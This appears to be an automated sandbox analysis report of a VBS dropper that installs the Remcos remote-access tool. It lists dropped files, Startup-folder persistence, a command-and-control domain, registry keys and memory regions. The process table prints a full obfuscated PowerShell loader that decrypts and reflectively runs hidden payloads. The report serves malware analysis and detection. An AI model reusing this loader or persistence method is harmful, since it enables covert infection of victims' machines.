Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO#2195112.vbs
|
ASCII text, with very long lines (65493), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
modified
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd
|
ASCII text, with very long lines (57944), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\dropped.bat
|
ASCII text, with very long lines (57944), with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqquqoso.ej0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guhx1ir3.4ob.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ih41ueii.2y3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ke0fwi21.nbe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkln13hb.bmr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0ual0dm.gjs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5kazo3e.x1q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xauxqvsl.prh.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv8D61.tmp
|
Extensible storage user DataBase, version 0x620, checksum 0xaf3ea1a6, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\oaanp
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2026), with CRLF line terminators
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO#2195112.vbs"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\dropped.bat
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw==');
$decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var);
$XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress);
$OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){
$sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ
= 'C:\Users\user\AppData\Roaming\dropped.bat';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach
($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var
$null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::FromBase64String('QipeuvuPHLjqQvGt9VT5aLclluvrXEdJm/QUWEGzhvQ='); $aes_var.IV=[System.Convert]::FromBase64String('K8KFKefFC/hhz69/oY9Vnw==');
$decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $cxhgH=New-Object System.IO.MemoryStream(,$param_var);
$XWybH=New-Object System.IO.MemoryStream; $OXCUo=New-Object System.IO.Compression.GZipStream($cxhgH, [IO.Compression.CompressionMode]::Decompress);
$OXCUo.CopyTo($XWybH); $OXCUo.Dispose(); $cxhgH.Dispose(); $XWybH.Dispose(); $XWybH.ToArray();}function execute_function($param_var,$param2_var){
$sMWNP=[System.Reflection.Assembly]::Load([byte[]]$param_var); $QqvvE=$sMWNP.EntryPoint; $QqvvE.Invoke($null, $param2_var);}$orZcJ
= 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SC.cmd';$host.UI.RawUI.WindowTitle = $orZcJ;$QZlmw=[System.IO.File]::ReadAllText($orZcJ).Split([Environment]::NewLine);foreach
($HiBel in $QZlmw) { if ($HiBel.StartsWith('gXFDerXikimqJOlowotV')) { $twZns=$HiBel.Substring(20); break; }}$payloads_var=[string[]]$twZns.Split('\');$payload1_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function
(decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var
$null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\oaanp"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\qungqkxv"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\bxtzrdixjge"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 7 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://www.office.com/
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaot
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingth
|
unknown
|
||
|
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=wsb
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingrms
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
https://aefd.nelreports.net/api/report?cat=bingaotak
|
unknown
|
||
|
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
|
unknown
|
||
|
https://deff.nelreports.net/api/report?cat=msn
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ab9001.ddns.net
|
64.188.16.157
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
64.188.16.157
|
ab9001.ddns.net
|
United States
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\chrorne-ML89BO
|
time
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
798F000
|
stack
|
page read and write
|
||
|
7340000
|
heap
|
page execute and read and write
|
||
|
2D63000
|
heap
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
6C7B000
|
stack
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
C3A000
|
heap
|
page read and write
|
||
|
1EA25B00000
|
heap
|
page read and write
|
||
|
1EA23569000
|
heap
|
page read and write
|
||
|
788C000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
7295000
|
heap
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page read and write
|
||
|
6D3E000
|
stack
|
page read and write
|
||
|
C73000
|
heap
|
page read and write
|
||
|
3043000
|
heap
|
page read and write
|
||
|
4B0E000
|
stack
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
1EA2358D000
|
heap
|
page read and write
|
||
|
6029000
|
trusted library allocation
|
page read and write
|
||
|
1EA235C0000
|
heap
|
page read and write
|
||
|
4C42000
|
trusted library allocation
|
page read and write
|
||
|
6E90000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
5B99000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
trusted library allocation
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
2ED3000
|
heap
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
4A00000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
8CD000
|
stack
|
page read and write
|
||
|
5046000
|
trusted library allocation
|
page read and write
|
||
|
912000
|
stack
|
page read and write
|
||
|
78A1000
|
heap
|
page read and write
|
||
|
86281FE000
|
stack
|
page read and write
|
||
|
459000
|
system
|
page execute and read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
720B000
|
stack
|
page read and write
|
||
|
2D65000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA24F30000
|
heap
|
page read and write
|
||
|
88B000
|
stack
|
page read and write
|
||
|
1EA25F90000
|
heap
|
page read and write
|
||
|
501B000
|
heap
|
page read and write
|
||
|
74F0000
|
trusted library allocation
|
page read and write
|
||
|
1EA23440000
|
heap
|
page read and write
|
||
|
6C3D000
|
stack
|
page read and write
|
||
|
1EA26DDA000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
CC0000
|
trusted library allocation
|
page read and write
|
||
|
74A2000
|
trusted library allocation
|
page read and write
|
||
|
AAF000
|
unkown
|
page read and write
|
||
|
1EA26EDE000
|
heap
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
707E000
|
stack
|
page read and write
|
||
|
1EA235C0000
|
heap
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
1EA23445000
|
heap
|
page read and write
|
||
|
2E00000
|
heap
|
page execute and read and write
|
||
|
4F10000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
1EA26A5E000
|
heap
|
page read and write
|
||
|
5076000
|
heap
|
page read and write
|
||
|
1EA24E80000
|
heap
|
page read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
50C1000
|
trusted library allocation
|
page read and write
|
||
|
CCD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA23511000
|
heap
|
page read and write
|
||
|
4F3C000
|
trusted library allocation
|
page read and write
|
||
|
2FDF000
|
unkown
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
4C45000
|
trusted library allocation
|
page read and write
|
||
|
1EA23535000
|
heap
|
page read and write
|
||
|
328F000
|
stack
|
page read and write
|
||
|
7540000
|
trusted library allocation
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
7131000
|
heap
|
page read and write
|
||
|
72A0000
|
heap
|
page read and write
|
||
|
3580000
|
heap
|
page read and write
|
||
|
794E000
|
stack
|
page read and write
|
||
|
7851000
|
heap
|
page read and write
|
||
|
1EA23410000
|
heap
|
page read and write
|
||
|
1EA23537000
|
heap
|
page read and write
|
||
|
6E3D000
|
stack
|
page read and write
|
||
|
1EA2350A000
|
heap
|
page read and write
|
||
|
1EA235C9000
|
heap
|
page read and write
|
||
|
1EA23545000
|
heap
|
page read and write
|
||
|
3002000
|
heap
|
page read and write
|
||
|
786B000
|
heap
|
page read and write
|
||
|
2FDC000
|
stack
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
501F000
|
heap
|
page read and write
|
||
|
743E000
|
stack
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
4C3A000
|
trusted library allocation
|
page read and write
|
||
|
4C37000
|
trusted library allocation
|
page read and write
|
||
|
C78000
|
stack
|
page read and write
|
||
|
32C0000
|
heap
|
page read and write
|
||
|
2DCE000
|
stack
|
page read and write
|
||
|
7F40000
|
trusted library allocation
|
page read and write
|
||
|
6CBE000
|
stack
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
86280FE000
|
stack
|
page read and write
|
||
|
7A70000
|
heap
|
page read and write
|
||
|
4FF0000
|
heap
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
8C8000
|
stack
|
page read and write
|
||
|
4AC0000
|
heap
|
page execute and read and write
|
||
|
7AC0000
|
trusted library allocation
|
page read and write
|
||
|
32E4000
|
trusted library allocation
|
page read and write
|
||
|
32F9000
|
trusted library allocation
|
page read and write
|
||
|
1EA25340000
|
heap
|
page read and write
|
||
|
9EE000
|
unkown
|
page read and write
|
||
|
1EA26D37000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
4B60000
|
heap
|
page read and write
|
||
|
84F0000
|
trusted library allocation
|
page read and write
|
||
|
30EF000
|
heap
|
page read and write
|
||
|
1EA23545000
|
heap
|
page read and write
|
||
|
1EA25658000
|
heap
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page execute and read and write
|
||
|
8500000
|
trusted library allocation
|
page read and write
|
||
|
C12000
|
heap
|
page read and write
|
||
|
2D83000
|
heap
|
page read and write
|
||
|
5001000
|
trusted library allocation
|
page read and write
|
||
|
53FE000
|
trusted library allocation
|
page read and write
|
||
|
3293000
|
heap
|
page read and write
|
||
|
1EA235C9000
|
heap
|
page read and write
|
||
|
2E4E000
|
stack
|
page read and write
|
||
|
528E000
|
stack
|
page read and write
|
||
|
1EA26D31000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
33EE000
|
unkown
|
page read and write
|
||
|
2DAE000
|
unkown
|
page read and write
|
||
|
BE0000
|
heap
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
4C4E000
|
trusted library allocation
|
page read and write
|
||
|
32E3000
|
trusted library allocation
|
page execute and read and write
|
||
|
C3E000
|
heap
|
page read and write
|
||
|
350F000
|
unkown
|
page read and write
|
||
|
C77000
|
heap
|
page read and write
|
||
|
4F40000
|
trusted library allocation
|
page read and write
|
||
|
86287FD000
|
stack
|
page read and write
|
||
|
1EA23561000
|
heap
|
page read and write
|
||
|
766E000
|
stack
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
502F000
|
heap
|
page read and write
|
||
|
7AA0000
|
trusted library allocation
|
page read and write
|
||
|
3317000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D7A000
|
stack
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
8F6000
|
stack
|
page read and write
|
||
|
6001000
|
trusted library allocation
|
page read and write
|
||
|
86283FE000
|
stack
|
page read and write
|
||
|
6DFE000
|
stack
|
page read and write
|
||
|
2FC3000
|
heap
|
page read and write
|
||
|
2D89000
|
heap
|
page read and write
|
||
|
789D000
|
heap
|
page read and write
|
||
|
1EA25B01000
|
heap
|
page read and write
|
||
|
6E7B000
|
stack
|
page read and write
|
||
|
3312000
|
trusted library allocation
|
page read and write
|
||
|
1EA235C0000
|
heap
|
page read and write
|
||
|
35E0000
|
heap
|
page read and write
|
||
|
73FE000
|
stack
|
page read and write
|
||
|
1EA260E8000
|
heap
|
page read and write
|
||
|
4AC5000
|
heap
|
page execute and read and write
|
||
|
4A2E000
|
stack
|
page read and write
|
||
|
52F0000
|
trusted library allocation
|
page read and write
|
||
|
71CD000
|
stack
|
page read and write
|
||
|
7520000
|
heap
|
page read and write
|
||
|
707E000
|
stack
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
73BE000
|
stack
|
page read and write
|
||
|
7281000
|
heap
|
page read and write
|
||
|
72B8000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
724E000
|
stack
|
page read and write
|
||
|
7810000
|
heap
|
page read and write
|
||
|
5260000
|
trusted library allocation
|
page read and write
|
||
|
1EA26D4D000
|
heap
|
page read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
74E0000
|
trusted library allocation
|
page read and write
|
||
|
7F50000
|
trusted library allocation
|
page read and write
|
||
|
5208000
|
trusted library allocation
|
page read and write
|
||
|
1EA26D4D000
|
heap
|
page read and write
|
||
|
7350000
|
trusted library allocation
|
page read and write
|
||
|
1EA26D37000
|
heap
|
page read and write
|
||
|
3762000
|
heap
|
page read and write
|
||
|
1EA25552000
|
heap
|
page read and write
|
||
|
7510000
|
trusted library allocation
|
page read and write
|
||
|
3192000
|
heap
|
page read and write
|
||
|
72AB000
|
heap
|
page read and write
|
||
|
72C8000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
728B000
|
heap
|
page read and write
|
||
|
759B000
|
stack
|
page read and write
|
||
|
1EA23519000
|
heap
|
page read and write
|
||
|
1EA235C9000
|
heap
|
page read and write
|
||
|
32D0000
|
trusted library allocation
|
page read and write
|
||
|
747D000
|
stack
|
page read and write
|
||
|
86286FE000
|
stack
|
page read and write
|
||
|
3264000
|
heap
|
page read and write
|
||
|
50D7000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
heap
|
page readonly
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
3413000
|
heap
|
page read and write
|
||
|
3086000
|
heap
|
page read and write
|
||
|
1EA2358F000
|
heap
|
page read and write
|
||
|
8DC000
|
stack
|
page read and write
|
||
|
52D0000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA235C0000
|
heap
|
page read and write
|
||
|
782E000
|
heap
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
70FE000
|
stack
|
page read and write
|
||
|
1EA26A5B000
|
heap
|
page read and write
|
||
|
C15000
|
heap
|
page read and write
|
||
|
2D62000
|
trusted library allocation
|
page read and write
|
||
|
730A000
|
stack
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
BD3000
|
heap
|
page read and write
|
||
|
90F000
|
stack
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
1EA26650000
|
trusted library allocation
|
page read and write
|
||
|
1EA234E0000
|
heap
|
page read and write
|
||
|
1EA2358D000
|
heap
|
page read and write
|
||
|
4C3F000
|
trusted library allocation
|
page read and write
|
||
|
1EA26C30000
|
heap
|
page read and write
|
||
|
1EA23450000
|
heap
|
page read and write
|
||
|
2DEF000
|
unkown
|
page read and write
|
||
|
3740000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
2EFA000
|
stack
|
page read and write
|
||
|
86285FE000
|
stack
|
page read and write
|
||
|
BA3000
|
heap
|
page read and write
|
||
|
49D0000
|
trusted library allocation
|
page read and write
|
||
|
4FEE000
|
stack
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
1EA23561000
|
heap
|
page read and write
|
||
|
4F2C000
|
stack
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
35EE000
|
heap
|
page read and write
|
||
|
783E000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page readonly
|
||
|
70BE000
|
stack
|
page read and write
|
||
|
1EA23569000
|
heap
|
page read and write
|
||
|
B90000
|
heap
|
page read and write
|
||
|
2D49000
|
trusted library allocation
|
page read and write
|
||
|
4E4A000
|
trusted library allocation
|
page read and write
|
||
|
1EA235C9000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page readonly
|
||
|
1EA23535000
|
heap
|
page read and write
|
||
|
2ED7000
|
heap
|
page read and write
|
||
|
2E8C000
|
stack
|
page read and write
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
2D80000
|
trusted library allocation
|
page read and write
|
||
|
914000
|
stack
|
page read and write
|
||
|
6CFF000
|
stack
|
page read and write
|
||
|
1EA23519000
|
heap
|
page read and write
|
||
|
7AE0000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
heap
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page execute and read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
1EA2583B000
|
heap
|
page read and write
|
||
|
7330000
|
heap
|
page read and write
|
||
|
BAC000
|
heap
|
page read and write
|
||
|
1EA25D0F000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page execute and read and write
|
||
|
8627DAA000
|
stack
|
page read and write
|
||
|
3315000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA26D30000
|
heap
|
page read and write
|
||
|
32ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
1EA2357E000
|
heap
|
page read and write
|
||
|
74A0000
|
trusted library allocation
|
page read and write
|
||
|
762F000
|
stack
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
4C74000
|
trusted library allocation
|
page read and write
|
||
|
1EA26E31000
|
heap
|
page read and write
|
||
|
4AAE000
|
stack
|
page read and write
|
||
|
7B10000
|
trusted library allocation
|
page execute and read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
5031000
|
trusted library allocation
|
page read and write
|
||
|
75EE000
|
stack
|
page read and write
|
||
|
3410000
|
heap
|
page read and write
|
||
|
C1F000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page readonly
|
||
|
A20000
|
heap
|
page read and write
|
||
|
4F88000
|
trusted library allocation
|
page read and write
|
||
|
CC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
A6E000
|
unkown
|
page read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
7550000
|
trusted library allocation
|
page read and write
|
||
|
1EA235D1000
|
heap
|
page read and write
|
||
|
500C000
|
trusted library allocation
|
page read and write
|
||
|
4ECE000
|
stack
|
page read and write
|
||
|
4F35000
|
heap
|
page execute and read and write
|
||
|
309E000
|
heap
|
page read and write
|
||
|
72BF000
|
heap
|
page read and write
|
||
|
3138000
|
heap
|
page read and write
|
||
|
354E000
|
stack
|
page read and write
|
||
|
32F0000
|
trusted library allocation
|
page read and write
|
||
|
50C4000
|
trusted library allocation
|
page read and write
|
||
|
538F000
|
stack
|
page read and write
|
||
|
2D7B000
|
heap
|
page read and write
|
||
|
74DD000
|
stack
|
page read and write
|
||
|
2F80000
|
heap
|
page readonly
|
||
|
1EA25373000
|
heap
|
page read and write
|
||
|
1EA23330000
|
heap
|
page read and write
|
||
|
4B81000
|
trusted library allocation
|
page read and write
|
||
|
1EA25D06000
|
heap
|
page read and write
|
||
|
76D1000
|
heap
|
page read and write
|
||
|
1EA26D3A000
|
heap
|
page read and write
|
||
|
3040000
|
heap
|
page read and write
|
||
|
1EA2357A000
|
heap
|
page read and write
|
||
|
2E9E000
|
stack
|
page read and write
|
||
|
324C000
|
heap
|
page read and write
|
||
|
A28000
|
heap
|
page read and write
|
||
|
4E8F000
|
stack
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
74C0000
|
trusted library allocation
|
page read and write
|
||
|
1EA2583D000
|
heap
|
page read and write
|
||
|
79CE000
|
stack
|
page read and write
|
||
|
526A000
|
trusted library allocation
|
page read and write
|
||
|
50C9000
|
trusted library allocation
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
1EA2350B000
|
heap
|
page read and write
|
||
|
50CE000
|
trusted library allocation
|
page read and write
|
||
|
35EF000
|
unkown
|
page read and write
|
||
|
7220000
|
heap
|
page read and write
|
||
|
C3B000
|
stack
|
page read and write
|
||
|
8FB000
|
stack
|
page read and write
|
||
|
5049000
|
heap
|
page read and write
|
||
|
4BA7000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
unkown
|
page read and write
|
||
|
4BB8000
|
trusted library allocation
|
page read and write
|
||
|
1EA26EDD000
|
heap
|
page read and write
|
||
|
4C4B000
|
trusted library allocation
|
page read and write
|
||
|
5063000
|
trusted library allocation
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
4E6C000
|
trusted library allocation
|
page read and write
|
||
|
49F0000
|
heap
|
page read and write
|
||
|
72B3000
|
heap
|
page read and write
|
||
|
1EA23512000
|
heap
|
page read and write
|
||
|
1EA23519000
|
heap
|
page read and write
|
||
|
B60000
|
heap
|
page read and write
|
||
|
1EA23578000
|
heap
|
page read and write
|
||
|
713F000
|
stack
|
page read and write
|
||
|
1EA26640000
|
heap
|
page read and write
|
||
|
1EA25550000
|
heap
|
page read and write
|
||
|
1EA26D36000
|
heap
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
7A0D000
|
stack
|
page read and write
|
||
|
5021000
|
heap
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
